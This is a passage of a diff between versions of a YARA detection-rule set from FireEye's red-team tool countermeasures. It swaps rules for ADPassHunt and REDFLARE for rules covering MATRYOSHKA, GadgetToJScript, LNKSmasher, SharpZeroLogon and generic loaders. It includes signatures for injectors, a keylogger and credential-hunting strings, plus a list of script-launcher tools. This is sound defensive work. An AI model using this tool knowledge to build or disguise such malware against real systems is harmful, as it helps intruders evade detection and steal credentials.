-		$s5 = "\\groups.xml" wide
-		$s6 = "Found interesting file:" wide
-		$s7 = "\x00GetDirectories\x00"
-		$s8 = "\x00DirectoryInfo\x00"
+		$s1 = "\x00matryoshka.exe\x00"
+		$s2 = "\x00Unable to write data\x00"
+		$s3 = "\x00Error while spawning process. NTStatus: \x0a\x00"
+		$s4 = "\x00.execmdstart/Cfailed to execute process\x00"
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and all of them
+		( uint16( 0 ) == 0x5A4D ) and ( uint32( uint32( 0x3C ) ) == 0x00004550 ) and all of them
 }
-rule FIREEYE_RT_APT_Hacktool_MSIL_Adpasshunt_1 : FILE
+rule FIREEYE_RT_APT_Loader_Win64_MATRYOSHKA_2 : FILE
 {
 	meta:
-		description = "No description has been set in the source file - FireEye-RT"
+		description = "matryoshka.rs"
 		author = "FireEye"
-		id = "736b5300-215b-5314-9234-69ff0050b73e"
+		id = "25f916bc-6ee1-5175-903c-4266b0a086e1"
 		date = "2020-12-02"
 		date = "2020-12-02"
 		modified = "2020-12-09"
 		reference = "https://github.com/mandiant/red_team_tool_countermeasures/"
-		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/ADPASSHUNT/production/yara/APT_HackTool_MSIL_ADPassHunt_1.yar#L4-L17"
+		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/MATRYOSHKA/production/yara/APT_Loader_Win64_MATRYOSHKA_2.yar#L4-L20"
 		license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt"
-		hash = "6efb58cf54d1bb45c057efcfbbd68a93"
-		logic_hash = "63135c81c1a6b967cb26cced628afc0e7ef485923e6a7fd70a4d4672118d6a8c"
-		score = 50
+		hash = "7f8102b789303b7861a03290c79feba0"
+		logic_hash = "daa6f6d526bf959c268b2c5a4cae33307cfec5e9ca51283131bbfa66a582b505"
+		score = 75
 		quality = 75
 		tags = "FILE"
-		rev = 2
+		rev = 1
 
 	strings:
-		$sb1 = { 73 [2] 00 0A 0A 02 6F [2] 00 0A 0B 38 [4] 12 ?? 28 [2] 00 0A 0? 73 [2] 00 0A 0? 0? 0? 6F [2] 00 0A 1? 13 ?? 72 [4] 13 ?? 0? 6F [2] 00 0A 72 [4] 6F [2] 00 0A 1? 3B [4] 11 ?? 72 [4] 28 [2] 00 0A 13 ?? 0? 72 [4] 6F [2] 00 0A 6F [2] 00 0A 13 ?? 38 [4] 11 ?? 6F [2] 00 0A 74 [2] 00 01 13 ?? 11 ?? 72 [4] 6F [2] 00 0A 2C ?? 11 ?? 72 [4] 11 ?? 6F [2] 00 0A 72 [4] 6F [2] 00 0A 6F [2] 00 0A 72 [4] 28 [2] 00 0A }
-		$sb2 = { 02 1? 8D [2] 00 01 [0-32] 1? 1F 2E 9D 6F [2] 00 0A 72 [4] 0A 0B 1? 0? 2B 2E 0? 0? 9A 0? 0? 72 [4] 6F [2] 00 0A 2D ?? 06 72 [4] 28 [2] 00 0A 0A 06 72 [4] 0? 28 [2] 00 0A 0A 0? 1? 58 0? 0? 0? 8E 69 32 CC 06 2A }
+		$sb1 = { 4D [2] 00 49 [2] 08 B? 02 00 00 00 31 ?? E8 [4] 48 89 ?? 48 89 ?? 4C 89 ?? 49 89 ?? E8 [4] 4C 89 ?? 48 89 ?? E8 [4] 83 [2] 01 0F 84 [4] 48 89 ?? 48 8B [2] 48 8B [2] 48 89 [5] 48 89 [5] 48 89 [5] 41 B? [4] 4C 89 ?? 31 ?? E8 [4] C7 45 [5] 48 89 ?? 4C 89 ?? E8 [4] 85 C0 }
+		$sb2 = { 4C [2] 0F 83 [4] 41 0F [3] 01 41 32 [2] 00 48 8B [5] 48 3B [5] 75 ?? 41 B? 01 00 00 00 4C 89 ?? E8 [4] E9 }
+		$si1 = "CreateToolhelp32Snapshot" fullword
+		$si2 = "Process32Next" fullword
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and all of them
+		( uint16( 0 ) == 0x5A4D ) and ( uint32( uint32( 0x3C ) ) == 0x00004550 ) and ( uint16( uint32( 0x3C ) + 0x18 ) == 0x020B ) and all of them
 }
-rule FIREEYE_RT_Credtheft_MSIL_Adpasshunt_2 : FILE
+rule FIREEYE_RT_APT_Builder_PY_MATRYOSHKA_1
 {
 	meta:
 		description = "No description has been set in the source file - FireEye-RT"
 		author = "FireEye"
-		id = "b6103e23-8d1c-5d01-b283-f4545ccb924e"
-		date = "2020-12-08"
+		id = "0135f3bb-28b3-5fc4-85a2-b12c46c8bc45"
+		date = "2020-12-02"
+		date = "2020-12-02"
 		modified = "2020-12-09"
 		reference = "https://github.com/mandiant/red_team_tool_countermeasures/"
-		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/ADPASSHUNT/production/yara/CredTheft_MSIL_ADPassHunt_2.yar#L4-L19"
+		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/MATRYOSHKA/production/yara/APT_Builder_PY_MATRYOSHKA_1.yar#L4-L22"
 		license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt"
-		hash = "6efb58cf54d1bb45c057efcfbbd68a93"
-		logic_hash = "e7282905a8baeaeb8ec156171fbf2bc4ac811facb80959a88394f4938a145cc1"
-		score = 50
+		hash = "25a97f6dba87ef9906a62c1a305ee1dd"
+		logic_hash = "71b26f4b319429ac356b55d22bccd1da85894d61f8c96452422de78d2d893420"
+		score = 75
 		quality = 75
-		tags = "FILE"
+		tags = ""
 		rev = 1
 
 	strings:
-		$pdb1 = "\\ADPassHunt\\"
-		$pdb2 = "\\ADPassHunt.pdb"
-		$s1 = "Usage: .\\ADPassHunt.exe"
-		$s2 = "[ADA] Searching for accounts with msSFU30Password attribute"
-		$s3 = "[ADA] Searching for accounts with userpassword attribute"
-		$s4 = "[GPP] Searching for passwords now"
+		$s1 = ".pop(0)])"
+		$s2 = "[1].replace('unsigned char buf[] = \"'"
+		$s3 = "binascii.hexlify(f.read()).decode("
+		$s4 = "os.system(\"cargo build {0} --bin {1}\".format("
+		$s5 = "shutil.which('rustc')"
+		$s6 = "~/.cargo/bin"
+		$s7 = /[\x22\x27]\\\\x[\x22\x27]\.join\(\[\w{1,64}\[\w{1,64}:\w{1,64}[\x09\x20]{0,32}\+[\x09\x20]{0,32}2\]/
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and ( ( @pdb2 [ 1 ] < @pdb1 [ 1 ] + 50 ) or 2 of ( $s* ) )
+		all of them
 }
-rule FIREEYE_RT_APT_Loader_Raw32_REDFLARE_1 : FILE
+rule FIREEYE_RT_Hunting_B64Engine_Dotnettojscript_Dos
 {
 	meta:
-		description = "No description has been set in the source file - FireEye-RT"
+		description = "This file may enclude a Base64 encoded .NET executable. This technique is used by the project DotNetToJScript which is used by many malware families including GadgetToJScript."
 		author = "FireEye"
-		id = "8f8ec27f-afac-5da5-b76f-b984e14e0066"
-		date = "2020-11-27"
-		date = "2020-11-27"
+		id = "24c9c259-9bb9-5f46-9278-4fa20eb3c8c4"
+		date = "2020-12-08"
 		modified = "2020-12-09"
 		reference = "https://github.com/mandiant/red_team_tool_countermeasures/"
-		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/REDFLARE/production/yara/APT_Loader_Raw32_REDFLARE_1.yar#L4-L16"
+		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/G2JS/production/yara/Hunting_B64Engine_DotNetToJScript_Dos.yar#L4-L15"
 		license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt"
-		hash = "4022baddfda3858a57c9cbb0d49f6f86"
-		logic_hash = "05ed89bd82600b4d5ef01ece2e0a9bd84e968988fd2bda1bab4ec316a9a9906b"
-		score = 75
+		hash = "7af24305a409a2b8f83ece27bb0f7900"
+		logic_hash = "e2afb43af469f8ae02f6fd21db6dbd45c997fb003e3aeeaa0d4ff3e85c64159a"
+		score = 50
 		quality = 75
-		tags = "FILE"
+		tags = ""
 		rev = 1
 
 	strings:
-		$load = { EB ?? 58 [0-4] 8B 10 8B 48 [1-3] 8B C8 83 C1 ?? 03 D1 83 E9 [1-3] 83 C1 [1-4] FF D? }
+		$b64_mz = "AAC4AAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAAAAOH7oOALQJzSG4AUzNIVRoaXMgcHJvZ3JhbSBjYW5ub3QgYmUgcnVuIGluIERPUyBtb2RlLg0NCiQAAAAAAAAAUEU"
 
 	condition:
-		( uint16( 0 ) != 0x5A4D ) and all of them
+		$b64_mz
 }
-rule FIREEYE_RT_APT_Trojan_Win_REDFLARE_2 : FILE
+rule FIREEYE_RT_Builder_MSIL_G2JS_1 : FILE
 {
 	meta:
-		description = "No description has been set in the source file - FireEye-RT"
+		description = "The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the Gadget2JScript project."
 		author = "FireEye"
-		id = "84881e5c-05df-5911-af42-ec82e559588c"
-		date = "2020-11-27"
-		date = "2020-11-27"
+		id = "484202c2-ac7d-5e6c-8bf1-3452a357c668"
+		date = "2020-12-08"
 		modified = "2020-12-09"
 		reference = "https://github.com/mandiant/red_team_tool_countermeasures/"
-		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/REDFLARE/production/yara/APT_Trojan_Win_REDFLARE_2.yar#L4-L20"
+		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/G2JS/production/yara/Builder_MSIL_G2JS_1.yar#L4-L15"
 		license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt"
-		hash = "9529c4c9773392893a8a0ab8ce8f8ce1,05b99d438dac63a5a993cea37c036673"
-		logic_hash = "1f2e1f644b1932486444dfda30b7dad7f50121f59fa493eb8a1a0528ae46db26"
+		hash = "fa255fdc88ab656ad9bc383f9b322a76"
+		logic_hash = "487d8e8deef218412f241d99ce32b63bfeb3568d23048b9dd4afff8f401bfea5"
 		score = 75
-		quality = 75
+		quality = 73
 		tags = "FILE"
 		rev = 2
 
 	strings:
-		$1 = "initialize" fullword
-		$2 = "getData" fullword
-		$3 = "putData" fullword
-		$4 = "fini" fullword
-		$5 = "Cookie: SID1=%s" fullword
+		$typelibguid1 = "AF9C62A1-F8D2-4BE0-B019-0A7873E81EA9" ascii nocase wide
 
 	condition:
-		( uint16( 0 ) == 0x5A4D ) and ( uint32( uint32( 0x3C ) ) == 0x00004550 ) and all of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and $typelibguid1
 }
-rule FIREEYE_RT_APT_Loader_Raw64_REDFLARE_1 : FILE
+rule FIREEYE_RT_Hunting_Gadgettojscript_1
 {
 	meta:
-		description = "No description has been set in the source file - FireEye-RT"
+		description = "This rule is looking for B64 offsets of LazyNetToJscriptLoader which is a namespace specific to the internal version of the GadgetToJScript tooling."
 		author = "FireEye"
-		id = "8e937f6a-404f-53bd-9de2-ed63b1cf48b2"
-		date = "2020-11-27"
-		date = "2020-11-27"
+		id = "76c932e0-55b3-56ef-bab6-eb6997b51ee7"
+		date = "2020-12-08"
 		modified = "2020-12-09"
 		reference = "https://github.com/mandiant/red_team_tool_countermeasures/"
-		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/REDFLARE/production/yara/APT_Loader_Raw64_REDFLARE_1.yar#L4-L16"
+		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/G2JS/production/yara/Hunting_GadgetToJScript_1.yar#L4-L17"
 		license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt"
-		hash = "5e14f77f85fd9a5be46e7f04b8a144f5"
-		logic_hash = "dac122ccece8a6dd35a5fe9d37860a612aa50ab469b79f4375dbe776f60c7b57"
-		score = 75
+		hash = "7af24305a409a2b8f83ece27bb0f7900"
+		logic_hash = "a880c20e61376dacd4e3a04f2cf065f19067c29371180b1dec186172cadf9564"
+		score = 50
 		quality = 75
-		tags = "FILE"
-		rev = 1
+		tags = ""
+		rev = 4
 
 	strings:
-		$load = { EB ?? 58 48 8B 10 4C 8B 48 ?? 48 8B C8 [1-10] 48 83 C1 ?? 48 03 D1 FF }
+		$s1 = "GF6eU5ldFRvSnNjcmlwdExvYWRl"
+		$s2 = "henlOZXRUb0pzY3JpcHRMb2Fk"
+		$s3 = "YXp5TmV0VG9Kc2NyaXB0TG9hZGV"
 
 	condition:
-		( uint16( 0 ) != 0x5A4D ) and all of them
+		any of them
 }
-rule FIREEYE_RT_APT_Keylogger_Win32_REDFLARE_1 : FILE
+rule FIREEYE_RT_Dropper_LNK_Lnksmasher_1 : FILE
 {
 	meta:
-		description = "No description has been set in the source file - FireEye-RT"
+		description = "The LNKSmasher project contains a prebuilt LNK file that has pieces added based on various configuration items. Because of this, several artifacts are present in every single LNK file generated by LNKSmasher, including the Drive Serial #, the File Droid GUID, and the GUID CLSID."
 		author = "FireEye"
-		id = "ad14db66-d640-5712-b2c8-a3d42d5a90f3"
-		date = "2020-12-01"
-		date = "2020-12-01"
+		id = "1b93ddf8-9578-5e47-b479-4c9e8a40b4f4"
+		date = "2020-12-08"
 		modified = "2020-12-09"
 		reference = "https://github.com/mandiant/red_team_tool_countermeasures/"
-		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/REDFLARE/production/yara/APT_Keylogger_Win32_REDFLARE_1.yar#L4-L17"
+		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/LNKSMASHER/production/yara/Dropper_LNK_LNKSmasher_1.yar#L4-L18"
 		license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt"
-		hash = "d7cfb9fbcf19ce881180f757aeec77dd"
-		logic_hash = "aebbaa050bee3775ffac4214ea4ab58284384e7eb41e66ee4838b9359e72821e"
+		hash = "0a86d64c3b25aa45428e94b6e0be3e08"
+		logic_hash = "61d1ac67ac0d332ad842a522cbebe1b9af1482d58a210b50fb45209355c0aeeb"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		rev = 2
+		rev = 6
 
 	strings:
-		$create_window = { 6A 00 68 [4] 6A 00 6A 00 68 00 00 00 80 68 00 00 00 80 68 00 00 00 80 68 00 00 00 80 68 00 00 CF 00 68 [4] 68 [4] 6A 00 FF 15 }
-		$keys_check = { 6A 14 [0-5] FF [1-5] 6A 10 [0-5] FF [1-5] B9 00 80 FF FF 66 85 C1 75 ?? 68 A0 00 00 00 FF [1-5] B9 00 80 FF FF 66 85 C1 75 ?? 68 A1 00 00 00 FF [1-5] B9 00 80 FF FF 66 85 C1 74 }
+		$drive_serial = { 12 F7 26 BE }
+		$file_droid_guid = { BC 96 28 4F 0A 46 54 42 81 B8 9F 48 64 D7 E9 A5 }
+		$guid_clsid = { E0 4F D0 20 EA 3A 69 10 A2 D8 08 00 2B 30 30 9D }
+		$header = { 4C 00 00 00 01 14 02 }
 
 	condition:
-		( uint16( 0 ) == 0x5A4D ) and ( uint32( uint32( 0x3C ) ) == 0x00004550 ) and ( uint16( uint32( 0x3C ) + 0x18 ) == 0x010B ) and all of them
+		$header at 0 and all of them
 }
-rule FIREEYE_RT_APT_Loader_Win32_REDFLARE_1 : FILE
+rule FIREEYE_RT_Hunting_LNK_Win_Genericlauncher : FILE
 {
 	meta:
-		description = "No description has been set in the source file - FireEye-RT"
+		description = "Signature to detect LNK files or OLE objects with embedded LNK files and generic launcher commands, except powershell which is large enough to have its own gene"
 		author = "FireEye"
-		id = "b8a2c388-3b27-5075-b0ee-2773ae0c67ad"
-		date = "2020-11-27"
-		date = "2020-11-27"
+		id = "1a12e475-bb18-55ab-b629-47b711c10e6b"
+		date = "2018-09-04"
 		modified = "2020-12-09"
 		reference = "https://github.com/mandiant/red_team_tool_countermeasures/"
-		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/REDFLARE/production/yara/APT_Loader_Win32_REDFLARE_1.yar#L4-L17"
+		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/LNKSMASHER/supplemental/yara/Hunting_LNK_Win_GenericLauncher.yar#L4-L22"
 		license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt"
-		hash = "01d68343ac46db6065f888a094edfe4f"
-		logic_hash = "f9165aabe4bad215211cf98559099030ddb8a76175fbfcfee3c6f25d7614bdad"
-		score = 75
-		quality = 75
+		hash = "14dd758e8f89f14612c8df9f862c31e4"
+		logic_hash = "a654cd3594e2d09950fb11bf8721a5cdb89f5d5be6e706f12e18c7fcdf7dd0fe"
+		score = 60
+		quality = 53
 		tags = "FILE"
-		rev = 1
+		rev = 7
 
 	strings:
-		$alloc_n_load = { 6A 40 68 00 30 00 00 [0-20] 6A 00 [0-20] FF D0 [4-60] F3 A4 [30-100] 6B C0 28 8B 4D ?? 8B 4C 01 10 8B 55 ?? 6B D2 28 }
-		$const_values = { 0F B6 ?? 83 C? 20 83 F? 6D [2-20] 83 C? 20 83 F? 7A }
+		$a01 = "cmd.exe /" ascii nocase wide
+		$a02 = "cscript" ascii nocase wide
+		$a03 = "jscript" ascii nocase wide
+		$a04 = "wscript" ascii nocase wide
+		$a05 = "wmic" ascii nocase wide
+		$a07 = "mshta" ascii nocase wide
+		$header = { 4C 00 00 00 01 14 02 }
 
 	condition:
-		( uint16( 0 ) == 0x5A4D ) and ( uint32( uint32( 0x3C ) ) == 0x00004550 ) and ( uint16( uint32( 0x3C ) + 0x18 ) == 0x010B ) and all of them
+		(( $header at 0 ) or ( ( uint32( 0 ) == 0xE011CFD0 ) and $header ) ) and ( 1 of ( $a* ) )
 }
-rule FIREEYE_RT_APT_Trojan_Win_REDFLARE_7 : FILE
+rule FIREEYE_RT_Hacktool_MSIL_SHARPZEROLOGON_1 : FILE
 {
 	meta:
-		description = "No description has been set in the source file - FireEye-RT"
+		description = "The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the public 'sharpzerologon' project."
 		author = "FireEye"
-		id = "f891e477-9ff2-57be-9ca5-dd87d9baee29"
-		date = "2020-12-02"
-		date = "2020-12-02"
+		id = "51f22eee-fb96-55b0-8c02-1a0e9910a93e"
+		date = "2020-12-08"
 		modified = "2020-12-09"
 		reference = "https://github.com/mandiant/red_team_tool_countermeasures/"
-		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/REDFLARE/production/yara/APT_Trojan_Win_REDFLARE_7.yar#L4-L21"
+		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/SHARPZEROLOGON/production/yara/HackTool_MSIL_SHARPZEROLOGON_1.yar#L4-L15"
 		license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt"
-		hash = "e7beece34bdf67cbb8297833c5953669, 8025bcbe3cc81fc19021ad0fbc11cf9b"
-		logic_hash = "6d7822256ac1bef05304d3396df773e2b20a397311ad820d6ec5fe4cb6bdfbbc"
+		hash = "dd8805d0e470e59b829d98397507d8c2"
+		logic_hash = "ed6a9bef5c6ee03aff969b8765b284ace517f2e6a1ef114acb04cf094c69cfa5"
 		score = 75
-		quality = 75
+		quality = 73
 		tags = "FILE"
-		rev = 1
+		rev = 3
 
 	strings:
-		$1 = "initialize" fullword
-		$2 = "getData" fullword
-		$3 = "putData" fullword
-		$4 = "fini" fullword
-		$5 = "NamedPipe"
-		$named_pipe = { 88 13 00 00 [1-8] E8 03 00 00 [20-60] 00 00 00 00 [1-8] 00 00 00 00 [1-40] ( 6A 00 6A 00 6A 03 6A 00 6A 00 68 | 00 00 00 00 [1-6] 00 00 00 00 [1-6] 03 00 00 00 45 33 C? 45 33 C? BA ) 00 00 00 C0 [2-10] FF 15 [4-30] FF 15 [4-7] E7 00 00 00 [4-40] FF 15 [4] 85 C0 }
+		$typelibguid0 = "15ce9a3c-4609-4184-87b2-e29fc5e2b770" ascii nocase wide
 
 	condition:
-		( uint16( 0 ) == 0x5A4D ) and ( uint32( uint32( 0x3C ) ) == 0x00004550 ) and all of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule FIREEYE_RT_APT_Downloader_Win64_REDFLARE_1 : FILE
+rule FIREEYE_RT_Loader_Win_Generic_17 : FILE
 {
 	meta:
 		description = "No description has been set in the source file - FireEye-RT"
 		author = "FireEye"
-		id = "15a5e22b-84b0-5b36-8772-1d496ac447b2"
-		date = "2020-11-27"
-		date = "2020-11-27"
+		id = "4e5bf741-c1e3-54af-9580-02925ba6fc6a"
+		date = "2020-11-25"
+		date = "2020-11-25"
 		modified = "2020-12-09"
 		reference = "https://github.com/mandiant/red_team_tool_countermeasures/"
-		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/REDFLARE/production/yara/APT_Downloader_Win64_REDFLARE_1.yar#L4-L17"
+		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/BEACON/supplemental/yara/Loader_Win_Generic_17.yar#L4-L19"
 		license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt"
-		hash = "9529c4c9773392893a8a0ab8ce8f8ce1"
-		logic_hash = "1b9bece6083403615841c752eac48fd20095e918d6e175563dd122be2885d875"
+		hash = "562ecbba043552d59a0f23f61cea0983"
+		logic_hash = "5c20472c3af0c5b8c825671b12763900d6a711695ed04661b33cbf442422348d"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		rev = 2
+		rev = 3
 
 	strings:
-		$const = "Cookie: SID1=%s" fullword
-		$http_req = { 00 00 08 80 81 3D [4] BB 01 00 00 75 [1-10] 00 00 80 00 [1-4] 00 10 00 00 [1-4] 00 20 00 00 89 [6-20] 00 00 00 00 [6-20] 00 00 00 00 [2-10] 00 00 00 00 45 33 C9 [4-20] 48 8D 15 [4] 48 8B 0D [4] FF 15 [4-50] B9 14 00 00 00 E8 }
+		$s0 = { 89 [1-16] FF 15 [4-16] 89 [1-24] E8 [4-16] 89 C6 [4-24] 8D [1-8] 89 [1-4] 89 [1-4] E8 [4-16] 89 [1-8] E8 [4-24] 01 00 00 00 [1-8] 89 [1-8] E8 [4-64] 8A [1-8] 88 }
+		$s1 = { 83 EC [1-16] 04 00 00 00 [1-24] 00 30 00 00 [1-24] FF 15 [4-16] EB [16-64] 20 00 00 00 [0-8] FF 15 [4-32] C7 44 24 ?? 00 00 00 00 [0-8] C7 44 24 ?? 00 00 00 00 [0-16] FF 15 }
+		$si1 = "fread" fullword
+		$si2 = "fwrite" fullword
 
 	condition:
-		( uint16( 0 ) == 0x5A4D ) and ( uint32( uint32( 0x3C ) ) == 0x00004550 ) and ( uint16( uint32( 0x3C ) + 0x18 ) == 0x020B ) and all of them
+		( uint16( 0 ) == 0x5A4D ) and ( uint32( uint32( 0x3C ) ) == 0x00004550 ) and all of them
 }
-rule FIREEYE_RT_APT_Loader_Win64_REDFLARE_1 : FILE
+rule FIREEYE_RT_Trojan_Win_Generic_101 : FILE
 {
 	meta:
 		description = "No description has been set in the source file - FireEye-RT"
 		author = "FireEye"
-		id = "dc162f26-66d3-5359-b1d7-ef2208b359e2"
-		date = "2020-11-27"
-		date = "2020-11-27"
+		id = "0290aaea-d65b-5883-97f9-549d107e3e1f"
+		date = "2020-11-25"
+		date = "2020-11-25"
 		modified = "2020-12-09"
 		reference = "https://github.com/mandiant/red_team_tool_countermeasures/"
-		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/REDFLARE/production/yara/APT_Loader_Win64_REDFLARE_1.yar#L4-L17"
+		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/BEACON/supplemental/yara/Trojan_Win_Generic_101.yar#L4-L20"
 		license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt"
-		hash = "f20824fa6e5c81e3804419f108445368"
-		logic_hash = "2cae245a6aa36dccc2228cccefdc4ca0eb278901f063e072a369000f67d73a55"
+		hash = "2e67c62bd0307c04af469ee8dcb220f2"
+		logic_hash = "e530183f3cab01560b1abc91e2111e5d9e5aadc1c8134027ac07d8917f9419a0"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		rev = 1
+		rev = 3
 
 	strings:
-		$alloc_n_load = { 41 B9 40 00 00 00 41 B8 00 30 00 00 33 C9 [1-10] FF 50 [4-80] F3 A4 [30-120] 48 6B C9 28 [3-20] 48 6B C9 28 }
-		$const_values = { 0F B6 ?? 83 C? 20 83 F? 6D [2-20] 83 C? 20 83 F? 7A }
+		$s0 = { 2A [1-16] 17 [1-16] 02 04 00 00 [1-16] FF 15 }
+		$s1 = { 81 7? [1-3] 02 04 00 00 7? [1-3] 83 7? [1-3] 17 7? [1-3] 83 7? [1-3] 2A 7? }
+		$s2 = { FF 15 [4-16] FF D? [1-16] 3D [1-24] 89 [1-8] E8 [4-16] 89 [1-8] F3 A4 [1-24] E8 }
+		$si1 = "PeekMessageA" fullword
+		$si2 = "PostThreadMessageA" fullword
 
 	condition:
-		( uint16( 0 ) == 0x5A4D ) and ( uint32( uint32( 0x3C ) ) == 0x00004550 ) and ( uint16( uint32( 0x3C ) + 0x18 ) == 0x020B ) and all of them
+		( uint16( 0 ) == 0x5A4D ) and ( uint32( uint32( 0x3C ) ) == 0x00004550 ) and @s0 [ 1 ] < @s1 [ 1 ] and @s1 [ 1 ] < @s2 [ 1 ] and all of them
 }
-rule FIREEYE_RT_APT_Loader_Win64_REDFLARE_2 : FILE
+rule FIREEYE_RT_Loader_Win_Generic_18 : FILE
 {
 	meta:
 		description = "No description has been set in the source file - FireEye-RT"
 		author = "FireEye"
-		id = "043f4e29-710d-5e17-a0ed-82cd3a565194"
-		date = "2020-11-27"
-		date = "2020-11-27"
+		id = "6f44bd64-29bd-50e2-8b61-7ba61bb1f688"
+		date = "2020-11-25"
+		date = "2020-11-25"
 		modified = "2020-12-09"
 		reference = "https://github.com/mandiant/red_team_tool_countermeasures/"
-		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/REDFLARE/production/yara/APT_Loader_Win64_REDFLARE_2.yar#L4-L18"
+		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/BEACON/supplemental/yara/Loader_Win_Generic_18.yar#L4-L19"
 		license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt"
-		hash = "100d73b35f23b2fe84bf7cd37140bf4d"
-		logic_hash = "9fad845ed963fae46ac7ddc44407d5f6ed0a061f6a106764b9f912ef718279b4"
+		hash = "c74ebb6c238bbfaefd5b32d2bf7c7fcc"
+		logic_hash = "28c9497f646fcf3daf7007d7afd37971dd85382062c064173f13049ad419fef1"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		rev = 1
+		rev = 3
 
 	strings:
-		$alloc = { 45 8B C0 33 D2 [2-6] 00 10 00 00 [2-6] 04 00 00 00 [1-6] FF 15 [4-60] FF 15 [4] 85 C0 [4-40] 20 00 00 00 [4-40] FF 15 [4] 85 C0 }
-		$inject = { 83 F8 01 [2-20] 33 C0 45 33 C9 [3-10] 45 33 C0 [3-10] 33 D2 [30-100] FF 15 [4] 85 C0 [20-100] 01 00 10 00 [0-10] FF 15 [4] 85 C0 [4-30] FF 15 [4] 85 C0 [2-20] FF 15 [4] 83 F8 FF }
-		$s1 = "ResumeThread" fullword
